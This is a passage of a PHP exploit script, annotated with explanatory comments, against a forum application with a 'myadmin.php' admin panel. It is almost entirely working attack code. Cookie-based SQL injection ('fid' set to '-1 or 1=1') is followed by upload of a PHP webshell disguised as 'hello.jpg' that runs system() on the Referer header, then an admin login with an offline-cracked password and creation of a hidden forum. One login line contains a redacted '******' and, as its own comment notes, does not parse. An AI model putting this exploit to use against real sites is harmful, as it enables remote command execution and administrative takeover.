        }
    }
}
# --- Step 1: offline password recovery (operator-assisted) -------------------
# The salt comes from an earlier regex capture ($vars[2][4], matched above this
# view); when it is missing the script falls back to the fixed string 'atk'.
# The hash is announced as a standard DES crypt() hash and is NOT cracked here:
# the operator cracks it out-of-band and pastes the plaintext on STDIN.
$salt = !empty($vars[2][4]) ? $vars[2][4] : 'atk';
# Fixed/predictable salt on the target -- the same salt for every account is what
# makes the offline attack cheap (one rainbow table / dictionary pass covers all).
print "\nsploit> Salt -> {$salt} (Standard DES hash)";
print "\nsploit> Enter the decrypted password to continue: ";
# Used verbatim in the login POST below; only surrounding whitespace is stripped.
$password = trim(fgets(STDIN));
# --- Step 2: SQL injection through the "fid" cookie -------------------------
# "-1 or 1=1" is a boolean tautology: wherever the target interpolates the fid
# cookie into a query, the WHERE clause matches every row. Enabling the cookie
# jar means this cookie (and any session cookie set later) rides on every
# subsequent request made through $xpl.
$xpl->addcookie("fid", "-1 or 1=1");
$xpl->cookiejar(1);
# --- Step 3: unrestricted file upload of a PHP webshell ---------------------
# The "upload" part is declared as image/jpg with a .jpg filename, but its body
# is PHP: extract($_SERVER) turns HTTP_REFERER into $HTTP_REFERER, which is then
# passed straight to system(). In other words the attacker's command is carried
# in the Referer header of the request that fetches the uploaded file, and the
# 337666733 markers delimit the command output so the client can extract it.
# (Whether the server actually keeps the .jpg as executable PHP depends on the
# target's avatar handling, which is not visible here.)
print "status> Uploading a malicious picture";
$formdata = array(frmdt_url => $url . "?owner={$owner}&action=profile", "email" => "{$name}@hotmail.coum", "url" => "http://", "upload" => array(frmdt_type => "image/jpg", frmdt_filename => "hello.jpg", frmdt_content => "<?php print 337666733;@extract(\$_SERVER);@system(\$HTTP_REFERER);print 337666733;exit(0); ?>"), "avatar" => "./avatar/welcome.jpg");
$xpl->formdata($formdata);
# --- Step 4: authenticate to the admin panel with the recovered password -----
# NOTE(review): the '******' between 'login=' and '&passwd=' is not valid PHP;
# it looks like a username redacted when this listing was published, so this
# line will not parse as shown. The original presumably carried the admin
# login name here -- confirm against the upstream source before reuse.
print "\nstatus> Trying to get logged in";
$xpl->post($url . 'myadmin.php?action=login', 'login='******'&passwd=' . $password);
# Login success is inferred solely from an ATK_ADMIN cookie appearing in the jar;
# anything else aborts the run.
if (preg_match("#ATK_ADMIN#i", $xpl->showcookie())) {
    print "\nsploit> Done";
} else {
    die("\nsploit> Exploit failed");
}
# --- Step 5: create a forum and recover its id ------------------------------
# The style name is scraped from the first <option value='...'> on the admin
# page (choix=2); if none is found the hard-coded default xml_BlueLight is used,
# so $styles[1] is always set when the create POST is built.
print "\nstatus> Creating a hidden forum";
$xpl->get($url . 'myadmin.php?choix=2');
if (!preg_match("#<option value='(\\S+)'#", $xpl->getcontent(), $styles)) {
    $styles[1] = "xml_BlueLight";
}
# Both title and filename are set to $name (defined earlier, outside this view).
$xpl->post($url . 'myadmin.php?action=create', "title={$name}&filename={$name}&passwd=&style=" . $styles[1] . "&structure=1&subject=");
# The forum id is read back from the "hide_forum&id=N" links on the listing page
# (choix=1); the LAST id found is taken, presumably the forum just created --
# this relies on the listing being ordered by id and on no concurrent creation.
$xpl->get($url . 'myadmin.php?choix=1');
if (!preg_match_all("#action=hide_forum&id=([0-9]+)#", $xpl->getcontent(), $fid)) {
    die("\nsploit> Can't retrieve the forum id");
}
$forumid = $fid[1][count($fid[1]) - 1];